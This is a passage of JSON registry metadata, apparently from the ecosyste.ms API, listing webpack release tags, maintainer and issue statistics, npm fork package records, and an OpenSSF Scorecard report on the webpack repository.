i/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-30T03:20:17.586Z","dependent_packages_count":1,"downloads":7,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":48.293345595762524,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.083753509832893,"forks_count":0.5281295915459677,"average":18.091431048289586},"purl":"pkg:npm/%40ricokahler/webpack3","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@ricokahler/webpack3","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@ricokahler/webpack3","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@ricokahler/webpack3/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T00:25:47.755Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ricokahler%2Fwebpack3/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ricokahler%2Fwebpack3/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ricokahler%2Fwebpack3/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ricokahler%2Fwebpack3/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ricokahler%2Fwebpack3/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ricokahler%2Fwebpack3/codemeta","maintainers":[{"uuid":"ricokahler","login":"ricokahler","name":null,"email":"ricokahler@me.com","url":null,"packages_count":73,"html_url":"https://www.npmjs.com/~ricokahler","role":null,"created_at":"2022-11-20T23:13:20.134Z","updated_at":"2022-11-20T23:13:20.134Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ricokahler/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2566941,"name":"webpack-debugger","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2018-10-09T05:43:29.940Z","latest_release_published_at":"2018-10-09T05:43:29.940Z","latest_release_number":"4.17.1","last_synced_at":"2026-09-03T00:15:18.574Z","created_at":"2022-04-10T03:37:55.795Z","updated_at":"2026-09-03T00:15:18.574Z","registry_url":"https://www.npmjs.com/package/webpack-debugger","install_command":"npm install webpack-debugger","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.17.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using 